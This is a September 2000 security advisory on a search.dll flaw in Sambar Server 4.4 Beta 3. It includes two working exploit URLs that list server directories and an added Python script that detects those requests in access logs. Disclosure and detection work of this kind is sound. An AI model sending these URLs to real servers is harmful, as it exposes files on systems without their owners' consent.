Title: Sambar Server search cgi vulnerability
Released by: Synnergy
Date: 15th September 2000
Vulnerable: Sambar Server 4.4 Beta 3

Systems   : WinNT, Win95 OSR2 (Linux possibly affected)
Product   : http://www.sambar.com
Discovery : dethy@synnergy.net

Discussion
-----------

The Sambar Server comes with a non-caching HTTP proxy server and basic SMTP,
POP3, and IMAP4 proxy servers compiled in.
Sambar was created to test a three-tier communication infrastructure modeled
after the Sybase Open Client/Open Server. Originally developed on a Sun
Workstation (UNIX), it was ported to the PC (Windows 32) and licensed for
commercial purposes.

Vulnerability
-------------

The vulnerability is in search.dll, the Sambar ISAPI Search module shipped
with this product. This dynamic link library does not validate the 'query'
parameter that is passed to the server, so by constructing a malformed URL
we are able to view the contents of the server: all folders and files.

Thanks also to USSR Labs (www.ussrback.com) for further testing.

Exploit
-------

All that is needed is a malformed query parameter passed to the search.dll
file.

http://server-running-sambar.com/search.dll?search?query=%00&logic=AND

This reveals the contents of the current working directory.

http://server-running-sambar.com/search.dll?search?query=/&logic=AND

This reveals the root directory of the server.

Solution
--------

The vendor [ tod@sambar.com ] of Sambar Technologies has been contacted, so
wait until a patched version comes out.
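
Until a patched version is installed, the web server's access log can be checked for the two request shapes shown under Exploit. The script below is an added example, not part of the Synnergy advisory: it assumes the log is in Common Log Format, the sample lines are constructed, and treating any 'query' value that starts with a path separator as suspicious is a heuristic chosen here.

```python
import re
from urllib.parse import unquote_to_bytes

# Request line inside a Common Log Format entry (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, using documentation-only IP ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2000:10:01:02 +0000] "GET /search.dll?search?query=firewall+rules&logic=AND HTTP/1.0" 200 2310',
    '198.51.100.7 - - [15/Sep/2000:10:03:40 +0000] "GET /search.dll?search?query=%00&logic=AND HTTP/1.0" 200 8841',
    '198.51.100.7 - - [15/Sep/2000:10:03:55 +0000] "GET /search.dll?search?query=/&logic=AND HTTP/1.0" 200 9127',
    '203.0.113.5 - - [15/Sep/2000:10:05:11 +0000] "GET /index.html?query=%00 HTTP/1.0" 200 512',
    '198.51.100.7 - - [15/Sep/2000:10:06:00 +0000] "GET /SEARCH.DLL?search?query=%2F&logic=AND HTTP/1.0" 200 9127',
]

def query_values(target):
    """Return percent-decoded 'query' values from a search.dll request target."""
    path, _, rest = target.partition("?")
    if not path.lower().endswith("/search.dll"):
        return []
    values = []
    # The advisory's URLs have the form search.dll?search?query=...&logic=AND,
    # so both '?' and '&' are treated as field separators.
    for field in re.split(r"[?&]", rest):
        name, sep, raw = field.partition("=")
        if sep and name.lower() == "query":
            values.append(unquote_to_bytes(raw.replace("+", " ")))
    return values

def classify(value):
    """Return a reason string for a suspicious 'query' value, else None."""
    if b"\x00" in value:
        return "nul-byte"      # the query=%00 request from the advisory
    if value.startswith((b"/", b"\\")):
        return "path-like"     # the query=/ request; backslash is an assumption
    return None

def scan(lines):
    """Return (line number, client address, reason) for each suspicious request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for value in query_values(match.group(1)):
            reason = classify(value)
            if reason:
                hits.append((lineno, line.split()[0], reason))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Values are decoded only once, so a doubly encoded value such as %2500 is not flagged by this check.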





Disclaimer
----------

Synnergy Networks may not be held liable for the use and/or potential effects
of these programs or advisories, nor the content contained within. Use them at
your own risk.





Contact
-------

E-Mail : dethy@synnergy.net
Web    : http://www.synnergy.net



--
Kind regards,

| Guido Bakker
| Network Manager

MainNet BV, http://www.mainnet.nl
Phone: +31 (0)20 6133505
Fax: +31 (0)20 6135640
